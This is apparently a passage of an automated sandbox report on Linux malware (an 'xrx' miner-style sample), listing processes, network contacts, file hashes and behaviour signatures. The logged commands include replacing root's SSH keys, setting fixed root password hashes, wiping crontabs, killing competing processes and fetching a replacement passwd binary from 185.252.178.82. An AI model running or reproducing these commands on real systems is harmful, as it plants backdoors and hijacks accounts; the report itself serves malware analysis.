KEz$LEz$ZBz$MEz$NEz$z$OEz$PEz$DDz$z$fz$QEz$REz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$ZEz$aEz$bEz$z$yz$HEz$IEz$Gz$Hz$cEz$dEz$eEz$fEz$sCz$gEz$lBz$z$IDz$JDz$KDz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$FEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$uCz$vCz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$qEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$aDz$sEz$hEz$iEz$tEz$eDz$fDz$z$yz$HEz$IEz$Gz$Hz$uEz$vEz$wEz$fEz$sCz$YDz$xEz$yEz$gCz$z$AFz$BFz$CFz$DFz$z$eBz$z$gDz$gEz$hEz$iEz$jEz$kEz$lEz$mEz$nEz$oEz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$EFz$FFz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$HFz$IFz$JFz$KFz$LFz$MFz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$IDz$JDz$KDz$LDz$MDz$NFz$OFz$PFz$z$IDz$JDz$KDz$LDz$MDz$QFz$RFz$SFz$z$TFz$UFz$VFz$WFz$YBz$XFz$YFz$ZFz$z$aFz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$PGz$VFz$WFz$dBz$vz$wz$xz$qBz$rEz$z$EDz$FDz$GDz$QGz$xBz$RGz$SGz$TGz$dBz$vz$wz$xz$qBz$rEz$z$xBz$UGz$VGz$WGz$XGz$YGz$cDz$xBz$RGz$ZGz$aGz$bGz$cGz$dGz$eGz$fGz$gGz$z$uCz$vCz$XFz$YFz$hGz$iGz$DFz$jGz$kGz$lGz$mGz$gEz$nGz$sBz$tBz$uBz$aBz$RBz$pEz$z$gDz$kCz$lCz$mCz$nCz$oGz$JFz$PGz$pGz$qGz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$rGz$sGz$z$xBz$bFz$cFz$dFz$eFz$fFz$gFz$hFz$iFz$jFz$kFz$lFz$mFz$nFz$oFz$pFz$qFz$rFz$sFz$tFz$uFz$vFz$wFz$xFz$yFz$AGz$BGz$CGz$DGz$EGz$FGz$GGz$HGz$IGz$JGz$KGz$LGz$MGz$NGz$OGz$tGz$uGz$TBz$UBz$VBz$bBz$cBz$z$IDz$JDz$KDz$vGz$jDz$wGz$ECz$FCz$sBz$tBz$uBz$aBz$RBz$pEz$z$IDz$JDz$KDz$vGz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$CHz$jDz$wGz$ECz$FCz$jDz$wGz$ECz$DHz$lEz$EHz$TBz$UBz$VBz$bBz$cBz$z$CHz$xGz$yGz$NCz$AHz$BHz$AEz$BEz$JCz$QFz$RFz$FHz$GHz$dBz$vz$wz$xz$qBz$rEz$z$HHz$jDz$IHz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$ZHz$aHz$JCz$QFz$RFz$bHz$TBz$UBz$VBz$bBz$cBz$z$hCz$iCz$cHz$dHz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$gDz$jDz$wGz$ECz$FCz$xGz$yGz$NCz$AHz$BHz$dBz$vz$wz$xz$qBz$rEz$z$yz$HEz$IEz$Nz$GFz$eHz$RFz$fHz$gHz$hHz$iHz$gCz$z$fz$aDz$bDz$jHz$JCz$QFz$kHz$lHz$mHz$mz$nz$z$HHz$nHz$NCz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$oHz$pHz$qHz$rHz$sHz$tHz$uHz$vHz$wHz$xHz$yHz$AIz$BIz$CIz$DIz$QFz$kHz$lHz$EIz$FIz$LBz$GIz$HIz$IIz$JIz$KIz$LIz$MIz$NIz$OIz$PIz$QIz$RIz$z$hCz$iCz$jCz$nHz$NCz$oHz$pHz$SIz$TBz$UBz$VBz$bBz$cBz$z$eBz$z$oHz$TIz$UIz$MDz$QFz$VIz$WIz$XIz$YIz$kEz$z$fz$QEz$ZIz$oHz$TIz$aIz$eDz$fDz$z$fz$bIz$HCz$cIz$dIz$kHz$lHz$eIz$fIz$gIz$aEz$bEz$z$yz$mDz$UEz$hIz$iIz$jIz$kIz$QIz$lIz$mIz$nIz$oIz$pIz$qIz$rIz$UEz$sIz$tIz$uIz$wGz$QIz$RIz$vIz$wIz$oHz$TIz$sGz$z$eBz$z$eBz$z$xIz$sGz$z$HHz$kCz$lCz$mCz$nCz$yIz$z$HBz$JHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$VHz$WHz$KHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$UHz$FBz$XHz$YHz$LHz$MHz$NHz$OHz$PHz$QHz$RHz$SHz$THz$AHz$BHz$z$hCz$iCz$jCz$kCz$lCz$mCz$nCz$AJz$ECz$BJz$z$CJz$DJz$EJz$FJz$GJz$z$fz$bIz$HCz$cIz$HJz$IJz$CJz$eDz$fDz$z$yz$mDz$JJz$KJz$AHz$BHz$LJz$xCz$yCz$ADz$BDz$AHz$BHz$vIz$MJz$NJz$OJz$PJz$z$eBz$z$eBz$z$fz$gz$hz$iz$jz$kz$lz$mz$nz$z$xBz$QJz$RJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$VJz$WJz$SJz$TJz$sBz$tBz$uBz$aBz$RBz$pEz$z$xBz$bFz$cFz$UJz$XJz$YJz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$xBz$bFz$cFz$dFz$eFz$bJz$cJz$dJz$eJz$fJz$gJz$hJz$iJz$jJz$kJz$lJz$mJz$nJz$oJz$pJz$qJz$rJz$sJz$tJz$uJz$vJz$wJz$xJz$yJz$AKz$BKz$CKz$DKz$EKz$FKz$GKz$HKz$IKz$JKz$OGz$ZJz$aJz$dBz$vz$wz$xz$qBz$rEz$z$CHz$kCz$lCz$mCz$nCz$oGz$JFz$KKz$LKz$ZJz$aJz$SEz$TEz$UEz$VEz$WEz$XEz$YEz$dBz$vz$wz$xz$qBz$rEz$z$eBz$z$fz$MKz$NKz$OKz$PKz$QKz$RKz$SKz$eDz$fDz$z$yz$HEz$IEz$Xz$uEz$vEz$wEz$TKz$UKz$YDz$xEz$yEz$gCz$z$AFz$BFz$kCz$lCz$mCz$VKz$z$eBz$z$fz$aDz$bDz$wCz$xCz$yCz$ADz$WKz$HBz$aIz$eDz$fDz$z$CHz$kCz$lCz$mCz$nCz$XKz$YKz$ZKz$kCz$lCz$mCz$aKz$bKz$cKz$z$hCz$iCz$jCz$kCz$lCz$mCz$aKz$bKz$cKz$z$eBz$z$kCz$lCz$mCz$aKz$bKz$cKz$dKz$tBz$uBz$aBz$eKz$tBz$uBz$aBz$fKz$gKz$hKz$iKz$jKz$z$xBz$kKz$lKz$ACz$BCz$CCz$DCz$ECz$FCz$GCz$HCz$ICz$JCz$KCz$LCz$MCz$NCz$LCz$OCz$LCz$PCz$QCz$RCz$sz$LBz$SCz$TCz$UCz$VCz$WCz$XCz$mKz$nKz$oKz$pKz$z$HBz$JHz$qKz$HIz$IIz$rKz$sKz$tKz$uKz$vKz$wKz$xKz$YFz$yKz$YFz$ALz$BLz$xBz$kKz$CLz$EIz$DLz$ELz$uHz$vHz$wHz$FLz$GLz$HLz$ILz$JLz$KLz$xGz$LLz$MLz$NLz$OLz$PLz$YFz$QLz$RLz$z$SLz$TLz$ULz$GJz$z$uCz$vCz$hEz$EJz$VLz$SLz$TLz$WLz$z$uCz$vCz$wCz$xCz$yCz$ADz$BDz$XLz$YLz$z$uCz$vCz$YBz$ZLz$z$yz$HEz$IEz$Zz$az$aLz$bLz$cLz$dLz$eLz$fLz$gLz$hLz$z$yz$HEz$IEz$Tz$Uz$Vz" /tmp/样本/Linux/shc加密脚本/73F9917255A953EB749F5A3C90E3B383]

/usr/bin/apt-get

[apt-get install -y msr-tools]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/lib/apt/methods/http

[/usr/lib/apt/methods/http]

/bin/sh

[/bin/sh -c /usr/sbin/dpkg-preconfigure --apt || true]

/usr/sbin/dpkg-preconfigure

[/usr/sbin/dpkg-preconfigure --apt]

/usr/local/sbin/locale

[locale charmap]

/usr/local/bin/locale

[locale charmap]

/usr/sbin/locale

[locale charmap]

/usr/bin/locale

[locale charmap]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-multi-arch]

/usr/bin/dpkg

[/usr/bin/dpkg --assert-protected-field]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/sbin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-split

[dpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/sbin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg-deb

[dpkg-deb --control /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb /var/lib/dpkg/tmp.ci]

/usr/sbin/tar

[tar -x -f - --warning=no-timestamp]

/usr/bin/tar

[tar -x -f - --warning=no-timestamp]

/usr/sbin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/dpkg-deb

[dpkg-deb --fsys-tarfile /var/cache/apt/archives/msr-tools_1.3-5build1_amd64.deb]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/usr/sbin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/rm

[rm -rf -- /var/lib/dpkg/tmp.ci]

/usr/bin/dpkg

[/usr/bin/dpkg --status-fd 32 --configure --pending]

/usr/sbin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/bin/sh

[sh -c -- (test -x /usr/lib/needrestart/dpkg-status && /usr/lib/needrestart/dpkg-status || cat > /dev/null)]

/usr/lib/needrestart/dpkg-status

[/usr/lib/needrestart/dpkg-status]

/usr/bin/mkdir

[mkdir -p /run/needrestart]

/usr/bin/touch

[touch /run/needrestart/unpacked]

/var/lib/dpkg/info/man-db.postinst

[/var/lib/dpkg/info/man-db.postinst triggered /usr/share/man]

/usr/bin/setpriv

[setpriv --reuid man --regid man --init-groups -- /usr/bin/mandb -pq]

/usr/bin/mandb

[/usr/bin/mandb -pq]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/test

[/usr/bin/test -e /usr/share/dbus-1/system-services/org.freedesktop.PackageKit.service]

/usr/bin/test

[/usr/bin/test -S /var/run/dbus/system_bus_socket]

/usr/bin/gdbus

[/usr/bin/gdbus call --system --dest org.freedesktop.PackageKit --object-path /org/freedesktop/PackageKit --timeout 4 --method org.freedesktop.PackageKit.StateHasChanged cache-update]

/bin/echo

[/bin/echo]

/bin/sh

[sh -c -- test -x /usr/lib/needrestart/apt-pinvoke && /usr/lib/needrestart/apt-pinvoke -m u || true]

/usr/lib/needrestart/apt-pinvoke

[/usr/lib/needrestart/apt-pinvoke -m u]

/usr/bin/dbus-send

[dbus-send --system --dest=org.freedesktop.login1 --print-reply /org/freedesktop/login1 org.freedesktop.DBus.Properties.Get string:org.freedesktop.login1.Manager string:PreparingForShutdown]

/usr/bin/rm

[rm -f /run/needrestart/unpacked]

/usr/sbin/needrestart

[/usr/sbin/needrestart -m u]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --vm --quiet]

/usr/bin/systemd-detect-virt

[/usr/bin/systemd-detect-virt --container --quiet]

/usr/local/sbin/who

[who -r]

/usr/local/bin/who

[who -r]

/usr/sbin/who

[who -r]

/usr/bin/who

[who -r]

/usr/bin/python3.12

[/usr/bin/python3.12 -]

/bin/sh

[sh -c -- if [ -d /var/lib/update-notifier ]; then touch /var/lib/update-notifier/dpkg-run-stamp; fi; /usr/lib/update-notifier/update-motd-updates-available 2>/dev/null || true]

/usr/bin/touch

[touch /var/lib/update-notifier/dpkg-run-stamp]

/usr/lib/update-notifier/update-motd-updates-available

[/usr/lib/update-notifier/update-motd-updates-available]

/usr/bin/apt-config

[apt-config shell StateDir Dir::State]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell ListDir Dir::State::Lists]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell DpkgStatus Dir::State::status]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell EtcDir Dir::Etc]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/apt-config

[apt-config shell SourceList Dir::Etc::sourcelist]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/find

[find /var/lib/apt/lists/ /etc/apt/sources.list //var/lib/dpkg/status -type f -newer /var/lib/update-notifier/updates-available -print -quit]

/usr/bin/dirname

[dirname /var/lib/update-notifier/updates-available]

/usr/bin/mktemp

[mktemp -p /var/lib/update-notifier]

/usr/lib/update-notifier/apt-check

[/usr/lib/update-notifier/apt-check --human-readable ]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/ischroot

[/usr/bin/ischroot -t]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/dpkg

[/usr/bin/dpkg --print-foreign-architectures]

/usr/bin/mv

[mv /var/lib/update-notifier/tmp.i7HbXgX644 /var/lib/update-notifier/updates-available]

/usr/bin/chmod

[chmod +r /var/lib/update-notifier/updates-available]

/usr/bin/rm

[rm -f /var/lib/update-notifier/tmp.i7HbXgX644]

/usr/bin/cat

[cat /etc/passwd]

/usr/bin/cut

[cut -d: -f1]

/usr/bin/grep

[grep /bin/bash\|/bin/sh\|/zsh\|/fish]

/usr/bin/tr

[tr \n ]

/usr/bin/chmod

[chmod +x /var/tmp/.xrx/uninstall.sh]

/var/tmp/.xrx/uninstall.sh

[/var/tmp/.xrx/uninstall.sh 2]

/usr/bin/rm

[rm -rf /var/tmp/.xrx/uninstall.sh]

/usr/bin/crontab

[crontab -r]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/usr/bin/rm

[rm -rf /etc/crontab]

/usr/bin/touch

[touch /etc/crontab]

/usr/bin/pkill

[pkill -9 xri]

/usr/bin/pkill

[pkill -9 xrx]

/usr/bin/pkill

[pkill -STOP xxi]

/usr/bin/pkill

[pkill -STOP xmu]

/usr/bin/pkill

[pkill -STOP dhcpi]

/usr/bin/chattr

[chattr -i /usr/lib/updated 2]

/usr/bin/chattr

[chattr -a /usr/lib/updated 2]

/usr/bin/rm

[rm -rf /usr/lib/updated]

/tmp/样本/Linux/shc加密脚本/init.sh

[./init.sh]

/usr/bin/chattr

[chattr -i /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -a /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys2]

/usr/bin/cp

[cp key /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr +ia /root/.ssh/authorized_keys]

/usr/bin/chattr

[chattr -ia /etc/shadow]

/usr/bin/chattr

[chattr -ia /etc/passwd]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/crontab

[crontab -u root -r]

/usr/bin/sudo

[sudo -u root sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /root/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /root/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ user]

/usr/bin/crontab

[crontab -u user -r]

/usr/bin/sudo

[sudo -u user sh -c echo $HOME]

/usr/bin/sh

[sh -c echo $HOME]

/usr/bin/rm

[rm -rf /home/user/.ssh/authorized_keys]

/usr/bin/cp

[cp /var/tmp/.xrx/key /home/user/.ssh/authorized_keys]

/usr/sbin/usermod

[usermod -p $6$8aivRNZIlSAxxOmo$KEPo7Yx0FCNDiuD6j7.iqvyyzrMlS9wcMObJlVwnyLn9lWGqXEDnO3bdOLh3dxrFW559vfuBhjAk2FqfKcvZv/ root]

/usr/bin/chattr

[chattr -iae /bin/passwd]

/usr/bin/chattr

[chattr -iae /usr/bin/passwd]

/usr/bin/mv

[mv /bin/passwd /bin/passwd.orig]

/usr/bin/mv

[mv /usr/bin/passwd /usr/bin/passwd.orig]

/usr/bin/curl

[curl -sO http://185.252.178.82:6972/passwd]

/usr/bin/wget

[wget -q http://185.252.178.82:6972/passwd]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 _http._tcp.se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
US 8.8.8.8:53 se.archive.ubuntu.com udp
SE 194.71.11.173:80 se.archive.ubuntu.com tcp
IT 185.252.178.82:6972 tcp
IT 185.252.178.82:6972 tcp

Files

/var/cache/apt/archives/partial/msr-tools_1.3-5build1_amd64.deb

MD5 41d685bb374b8b9765cc8ad68c6ddd7c
SHA1 4d7f9893b486db574f737fd82f89f1db05d44e4e
SHA256 aa668bd5e23e3f703518eec2e52fffd6275c897ba84ef8a34ef646ac4dde32f4
SHA512 b9d5800641b0fb294d1688faf9dbd0a461a6347f405ab106dc6e2c71a0667c9a39eeb95904a218e5af57683a4f1882876f4ab538aecde442f68265c7467127a0

/var/log/apt/eipp.log.xz

MD5 cc6206f59ec7a64c75f24e79d19c69f7
SHA1 9e5ede07f6b85a9105aa234fa3e78898c3997fb2
SHA256 a961625a91f21ebeed9d5b96cd4063dd72a067d1c41884809f5590573471fad5
SHA512 ce257843f03d72692c7890df5f59943263144314f5fd817bff690458ec26096bb3dec1bd87beb8310580e86618f28282bb1b26366f832ab2eb5ccd8f8ff12c2f

/var/lib/dpkg/updates/tmp.i

MD5 0c83c7b81780508a33c1ea43e49bd0ab
SHA1 1bd385df4de89b74a9e0eaeb42078a3aa13e7a56
SHA256 9c1311fe3442b3427006b95fafa9e55261702b36fbc90b3300e9aca091498dd1
SHA512 97328bd96c405168e5226780a4664f1a6c4406c7b3ec66899d898053346c3e070e7c7cf7e2b659a1781fe5822ec9a6440beb2047e98994977e576562f5d33747

/var/lib/dpkg/tmp.ci/control

MD5 1e0f0dfa728ed7715510e29d0c820cfa
SHA1 9e20884889df0752af14f0afcc0a6bbdb5470c62
SHA256 7263b977924b9c59af6a5ad7da21e3f85d24beb3c4f0d6515ff1eb06fc11af4a
SHA512 41afc8ea626977e98101a9cf492c0d9736f32cc4bb2d0496d2a46769807a01f5282ba00c07141956eea7c364c7b5ce8966b2a891b7dd77d3fdab84b4ccd1f2b2

/var/lib/dpkg/tmp.ci/md5sums

MD5 f0183116fb005f86b0d573c6473fae9b
SHA1 6672eb52c0cb916df1c6924ace41b81264ef0b8b
SHA256 b08ea9d4bf7879ee69d29795219f6958979932f80976133636eecf5d8e9f1272
SHA512 314038597f986c2e1816b865e085014905b92e94d73f08b11a0b560362edb48a335a708617ae310375619752514475c93e48f6a4461e7675206cb5ec884f3a81

/var/lib/dpkg/updates/tmp.i

MD5 6e67dede930df3bc51a5d372940d8c75
SHA1 03a54c296eb9f17c41ea1142f7f2c2c70d715e20
SHA256 087c445cd41888ce3da908be88a19b2bec608e999d92cf006a2aaaebf9452bde
SHA512 28867ada88b421d70616002150c5e91bbd402907365932f9b1a47e3a36233a4f16791e457ff7e1a59eaced3c4bf16626675b6d6e282a50fd9b94397b1126077b

/var/lib/dpkg/updates/tmp.i

MD5 34eb56f174133f283fdc94da47b268f3
SHA1 c68b6ee72b7027222df4bed6b2fba79a3c56b670
SHA256 ad6b382be033c06573cc513c010fe8b7f6be7d43194923bf5e488ed093b8fd83
SHA512 f5195388268211b15e3c27583138d541ec581cb8e3ccea4c26f40cace1a06826cf2997603bddac110e935f84453ca33af08c048d7be76951d9543f41ede2574d

/var/lib/dpkg/updates/tmp.i

MD5 05ffb6efd8d30243a913f95453c376ab
SHA1 d3b05c42a5c9db40d2f375f40764cc2c81e14fcc
SHA256 78b6c50455d3659bb7effbb14312d8eeea86c3a248d0a497e43cf4d6d7ea0be3
SHA512 4c008f42d41d0b150c70593bc9d30152b3738f3341a73d4d3ec1ec8c3e4194b0a633efc1a8570fbdbd29032c323686a58d8d2fc9c922e49d3c399db0c5e9f98b

/var/lib/dpkg/updates/tmp.i

MD5 edae9b7299f2afc09258160786a4dada
SHA1 dd7aa0c8aa29e937efd88b9eb39811e1460b62b9
SHA256 cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569
SHA512 0e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff

/var/lib/dpkg/status-new

MD5 fda2311561ddfd0654505fa2cf369d91
SHA1 2a1be09d3084d3e2ff26e6048f4176af376b1a76
SHA256 0675b27fe2f05cf66d498e5ec5bb6f975aed807cf55440c03bb50a6800435500
SHA512 bef483a282d05f4bee4d3f0c353588cf03e1e7db8fcb9149c1c769a30bf1d247fd74c77485fa630317eff8c4dc6dc114319fdd7526e527e6f755ddb3e1e71e4c

/var/cache/man/2511

MD5 37106c0ca44953e5d7da743c5293634f
SHA1 8466df9e62da69995aaf6706af447e41c34b8010
SHA256 3e9b6f702bb7b5bef6331b69b9a4de18bfe8f7d006808213a72e0911a04fc507
SHA512 e01226df669f3eee9f60acea93c70adb27a3442477e54157eb3182464a7be5323ddf943766e2370ef9e9138172373ae1781c87483685428bd4548f59249b3555

/var/lib/dpkg/status-new

MD5 fc66f74346fb6e7b8d5593e437ceb6f3
SHA1 f35dc1b6a2457ea70067c1a5e48c10ba22fce953
SHA256 e26fb022c7efc9ae568e73e8b1f2034680d977bc2af726d50ce79a69ee0ad3a9
SHA512 68949144614c196d0d1bb9a94be6aa95670080115bcdb1253d1e66fdfd8244dbeda32c6dda2c8850275fc9382da452df58aafae1c2d5f8bbb0803ce1e7d3c425

/var/lib/update-notifier/tmp.i7HbXgX644

MD5 9e4474dd78060139ab355ed18427f88e
SHA1 e4608e740783b34ab9917ce0a4f379a9c760e725
SHA256 6e285b096a5771d3f0f75b00ea3ce4df1fa1648b6f6ba2311bd8eb5e0c90c708
SHA512 777cad103870948f8109488fe8c02a2ef616aca87319c446d305bb6ddcc01093266bcf78d1e76871937bde94e175a72b574985b33f693e7e0e542b9ed9f87706

/etc/passwd+

MD5 cea58ef2a54a8678646f9398f140d2de
SHA1 46ab8bcd243efa9c87b3859cd342f683f168e133
SHA256 ec0d3574508143d89a5ca35fcc9fe9ae0b0a1a6b0d89f47cbe17ac1d9d88072a
SHA512 9d6879919c7aeb654b27bd67292ebd5e5799cf184d5b45e4debb2d2d8666aebd1e078bfaed7cdb360d0e79a69f01aae009ff5867bf1688389e373de422177d74

/etc/shadow+

MD5 d7a85719c83ad82342977752cf9b80b8
SHA1 96f41ef03a12a79c5f02fead5d3d11d98d472076
SHA256 bd7ef2ec829df7491b07c9983fba359d0ba7b6769ba5aaa12dfdc9f3d876c2d1
SHA512 4a6280218bd6fd7498eb2eff6ef9d556df19cf65dda3d391322fec1ee297e7c7d509877861821826f95fa97915ff2d83fcc8cc466c6eda574c75c337d1ba4972

/etc/shadow+

MD5 16ff2b6271f85414ccb5eb7dc3695a9d
SHA1 811077d49f14b2b00ca2fa76b80b6fca991458af
SHA256 1e2c1845fa65f472715c4bdaa50a742ca8cb3a8ef17e1c9eeb0bed4ff4db4708
SHA512 4e80b20e58838c141ae3dd066cd652de3d3384a356db05de447d9c9aeed24cfa0c2f1edc4380fe06f8af4b197d11301b76a2dd5f369cea645e1f7f612fdd94b6

Analysis: behavioral16

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

0s

Max time network

128s

Command Line

[/tmp/xrx/chattr]

Signatures

N/A

Processes

/tmp/xrx/chattr

[/tmp/xrx/chattr]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\xrx\config.json

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\xrx\config.json

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-12-02 02:52

Reported

2024-12-02 02:55

Platform

ubuntu2404-amd64-20240729-en

Max time kernel

140s

Max time network

149s

Command Line

[/tmp/xrx/init0]

Signatures

Adds new SSH keys

persistence privilege_escalation
Description Indicator Process Target
File opened for modification /root/.ssh/authorized_keys /usr/bin/cp N/A

Modifies password files for system users/ groups

persistence credential_access defense_evasion
Description Indicator Process Target
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A
File opened for modification /etc/passwd /usr/sbin/usermod N/A
File opened for modification /etc/shadow /usr/sbin/usermod N/A

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /usr/bin/chmod N/A

OS Credential Dumping

credential_access
Description Indicator Process Target
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
File opened for reading /etc/shadow /usr/bin/sudo N/A
File opened for reading /etc/shadow /usr/sbin/usermod N/A
